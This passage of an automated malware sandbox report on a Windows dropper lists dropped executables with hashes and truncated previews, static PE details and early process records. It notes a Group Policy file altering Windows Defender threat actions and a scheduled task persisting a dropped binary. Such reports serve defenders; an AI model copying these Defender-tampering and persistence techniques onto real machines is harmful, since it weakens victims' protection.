                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):6612583
                            Entropy (8bit):7.996031565583186
                            Encrypted:true
                            SSDEEP:196608:91OcYDzJRIeC9BhkXw4751Kw57ro+2ozB+ZW6UoXm:3ORVRvC9DkXV751x5Y+2XXUgm
                            MD5:ACF9F750C53A4655AF0F2C792DC05166
                            SHA1:E977B268B5C249287A4696337636A84F16F0F27C
                            SHA-256:35202DF1D0FC3C21B4309528C02E25D7C97D2CBA4AFBE582BE302FCC15B85BA7
                            SHA-512:0F0BF7FA8F0D0C39CFD57C27A150C54CBCC507BC59309B06184F776CAFCFE827E853A2107479891652C31714A33D15A699A463C4C25AA4E5400B7B0CD000DD43
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\7zS7660.tmp\__data__\config.txt

                            Download File
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):829142
                            Entropy (8bit):7.999776755620295
                            Encrypted:true
                            SSDEEP:24576:khCiEwCogjACGlLO5Q5jmxuUw7kl/Klh0zy:khCibnCGQ6sxu6ah0+
                            MD5:BD5AA50828D7B24A25BAA86F0111EFC5
                            SHA1:48B315492C85E24FE13313F0340BB4FDCD3DD8C3
                            SHA-256:62B68829035BDA62873B1D714D92CF0731DF9C017486B1811CD041F42B622669
                            SHA-512:D95EF015A3AE028D2D4F38412C028084BC5461013A2B350BC0607B8D148836D6689A9E83AA3455B0D821F21D6DA58D2C318A0AEC72700020B01372891D5FE14E
                            Malicious:false
                            Preview:<H.....C+.a.Q|#..t._..Z-/..S..[5....>-P.u..o!......9On_......Q}.K...x.e...L[....v^..02......cC2..o....7.2@...z.pBn......,....f..V....e}.n..kWT.%....K@0k.m...-.a...Yk...$G8...k./v.|.0..z.1.0.........s.t./.re,.M.hjb..j...?.c.QC$.1..^]w..^....doS.....C_P.G...v-R.R.|...QF...+k..........'.E4w.J....."R>.....v...Z...@..a..|.a...`.f..@..c2...s......b..N..M~...W.,!...7.{4[....W0..x...P..)...|]$..;3$...:R.Dy..z.d...T.V..&..<L..].b..cZ%@.(.1B.&..Y..D.cn]......^ ..R..Xw..V#.}L..X>L.)..<k...p'..#....{.S2...u{.4v?.....B..k....A..l.u.@F...f..(.X].g..B..dY.-*g..........U2-.n..Y.UH.c.....?....(..\...^...^'9..7F1A.........F....@..i7.~.mk...|..z...5....J.."..]..9...#9...._.q.`^..Y...D>. ...7...............A.....4>.6f.F.2_.<..Y:.[..$.r...9..I......2.........K.9|..K.!.,.......T..R..=qY.qG....WZ...w`.\.qD<..'.m....s.g..!.]J....s.q...}5.<...u...,.P..qz.IV._CM...=..o.C..c8j.=.:.v.3.l.n....Vf...t%..QeY`.j&.'1.zaF.t6CE.yV.@...#Jf.q.C..^...Q?1r.F..1.."xhr2.

                            C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51dg5nm5.red.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjlwuhty.2rf.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12148
                            Entropy (8bit):5.378102183481723
                            Encrypted:false
                            SSDEEP:192:2tH+avF24XpAPcVUYNj2DAsbCEBOMSVFEJ+aNK1eS9kN8rI:2teMN1UW095lSVmerI
                            MD5:BECE3AD71BBF886EFC77494DF9CDF0D1
                            SHA1:BFE9016195D99ACE1E873DC9B0B8A1543E7B36E7
                            SHA-256:69C759DC9A5CC1C3285FE86BBAA6593205894F42057C66274560EE8CDEEE828F
                            SHA-512:BB4D0F15C6C8618353AC73CAFCCF9CA34A031962C88A1319A0A8F8F1C24E90090275ECA95E4160B486908001EFF00D2DE8D20B504E0CBCFFD3282C790F2EA465
                            Malicious:false
                            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@..S@..T@..T@.

                            C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            File Type:RAGE Package Format (RPF),
                            Category:dropped
                            Size (bytes):4486
                            Entropy (8bit):3.5451092744791444
                            Encrypted:false
                            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ070wY0r04020s0G0wxok:Bx
                            MD5:30C693CF3EA702119A0F92E1002295B3
                            SHA1:37DB400CD4BDD79E0D9872EAC50B005A3E5B3B7C
                            SHA-256:19974A72A726C1378FBF1B21D7FCEA80CFD22068A70DE846AC3D13E6BE053A0E
                            SHA-512:2FB7053CB469B4083BD6FB680C7FACE3A1FEAA19736D3FCF69B6B49D1E6EC553384642FFCB8EC62D88AA3896C4991663E34D87E75D24C498B759C62E05C3CEE1
                            Malicious:false
                            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

                            C:\Windows\System32\GroupPolicy\gpt.ini

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):268
                            Entropy (8bit):4.9507895998010145
                            Encrypted:false
                            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                            Malicious:true
                            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

                            C:\Windows\Tasks\bbrwVHWbINAVAbZleQ.job

                            Download File
                            Process:C:\Windows\SysWOW64\schtasks.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):526
                            Entropy (8bit):3.676691784811369
                            Encrypted:false
                            SSDEEP:12:O8jSX2RKQ10smIYMGmlAU9TM5KRKQ10smIYMGeUFHRQVbg:OAJ995YnURD995YJH
                            MD5:2C3BBF0A2BFC0FF21774F3AFBF53BB60
                            SHA1:0DBA401F0C4D277FA2BF95B39E6AB3F6102DE92A
                            SHA-256:E65B43863D62718D6D5AC3400205559D1FB5A6C3D25FA9C0809290A259FE9C73
                            SHA-512:D20A0652ED6C0371A686526F38AA65FA96E2CE26D74FD37C15AC27A4CA388614B5271B5F09A04851C8943FD50CF97A382D6B69EEF33E59C65D65445EDC0CFCF6
                            Malicious:false
                            Preview:.....D..%.@...6....F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.C.O.V.p.F.h.P.t.q.Y.P.o.U.N.u.B.L.\.z.K.Y.z.p.P.s.G.I.V.I.s.l.M.C.\.K.Z.D.O.W.c.h...e.x.e.....U.B. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...D.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.C.O.V.p.F.h.P.t.q.Y.P.o.U.N.u.B.L.\.z.K.Y.z.p.P.s.G.I.V.I.s.l.M.C.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.j.o.n.e.s...................0...............................................

                            C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Windows\Temp\__PSScriptPolicyTest_utdwgpnk.bdn.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Windows\Temp\__PSScriptPolicyTest_v35xt4kd.vzs.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\System32\gpupdate.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):129
                            Entropy (8bit):4.366220328806915
                            Encrypted:false
                            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                            Malicious:false
                            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.996937993784458
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:7607851
                            MD5:4a0ace7e59a840307eafe3c5975a7638
                            SHA1:5677a49aa5125af2bf2ce60dc9f304a106b462c1
                            SHA256:d6c028269bdbe895a6215ed9ba31b1e1fb674d1fb1edb713c133402c0c55fabf
                            SHA512:f3b4ab3e3de7b5ceeb6b1540b8dd3268425883cf5ee971d7098d44aa4c9c6d56d653e6f6995a43c41f45509f2c9aa6fd32f9a5c8b851d171899dae024714b238
                            SSDEEP:196608:91OZxFEtrnpCZf7hEQukI/tbnXQCjhE7+BZ9VopW0go:3OZvElnpCVlEFljuqBZzHW
                            TLSH:52763334B0E2DAB6CE8515739C549BE6D3E9E42B0F345D773BE80C394BBD9A02538A11
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

                            File Icon

                            Icon Hash:8484d4f2b8f47434

                            Static PE Info

                            General

                            Entrypoint:0x414b04
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:3786a4cf8bfee8b4821db03449141df4

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            push FFFFFFFFh
                            push 0041B9E0h
                            push 00414A2Ch
                            mov eax, dword ptr fs:[00000000h]
                            push eax
                            mov dword ptr fs:[00000000h], esp
                            sub esp, 58h
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-18h], esp
                            call dword ptr [0041B074h]
                            xor edx, edx
                            mov dl, ah
                            mov dword ptr [004233D0h], edx
                            mov ecx, eax
                            and ecx, 000000FFh
                            mov dword ptr [004233CCh], ecx
                            shl ecx, 08h
                            add ecx, edx
                            mov dword ptr [004233C8h], ecx
                            shr eax, 10h
                            mov dword ptr [004233C4h], eax
                            push 00000001h
                            call 00007F0480A2D84Bh
                            pop ecx
                            test eax, eax
                            jne 00007F0480A2C9BAh
                            push 0000001Ch
                            call 00007F0480A2CA78h
                            pop ecx
                            call 00007F0480A2D2FDh
                            test eax, eax
                            jne 00007F0480A2C9BAh
                            push 00000010h
                            call 00007F0480A2CA67h
                            pop ecx
                            xor esi, esi
                            mov dword ptr [ebp-04h], esi
                            call 00007F0480A2F46Ch
                            call dword ptr [0041B078h]
                            mov dword ptr [00425A3Ch], eax
                            call 00007F0480A2F32Ah
                            mov dword ptr [00423340h], eax
                            call 00007F0480A2F0D3h
                            call 00007F0480A2F015h
                            call 00007F0480A2EA70h
                            mov dword ptr [ebp-30h], esi
                            lea eax, dword ptr [ebp-5Ch]
                            push eax
                            call dword ptr [0041B07Ch]
                            call 00007F0480A2EFA6h
                            mov dword ptr [ebp-64h], eax
                            test byte ptr [ebp-30h], 00000001h
                            je 00007F0480A2C9B8h
                            movzx eax, word ptr [ebp+00h]

                            Rich Headers

                            Programming Language:
                            • [ C ] VS98 (6.0) SP6 build 8804
                            • [C++] VS98 (6.0) SP6 build 8804
                            • [ C ] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                            RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
                            RT_DIALOG0x278d80xb8dataEnglishUnited States
                            RT_STRING0x279900x94dataEnglishUnited States
                            RT_STRING0x27a280x34dataEnglishUnited States
                            RT_GROUP_ICON0x278b00x22dataEnglishUnited States
                            RT_VERSION0x271e00x2bcdataEnglishUnited States

                            Imports

                            DLLImport
                            OLEAUT32.dllVariantClear, SysAllocString
                            USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                            SHELL32.dllShellExecuteExA
                            KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            No network behavior found

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:16:10:59
                            Start date:31/12/2022
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x400000
                            File size:7607851 bytes
                            MD5 hash:4A0ACE7E59A840307EAFE3C5975A7638
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:1
                            Start time:16:11:01
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe
                            Imagebase:0x400000
                            File size:6612583 bytes
                            MD5 hash:ACF9F750C53A4655AF0F2C792DC05166
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            General

                            Target ID:2
                            Start time:16:11:03
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            Wow64 process (32bit):true
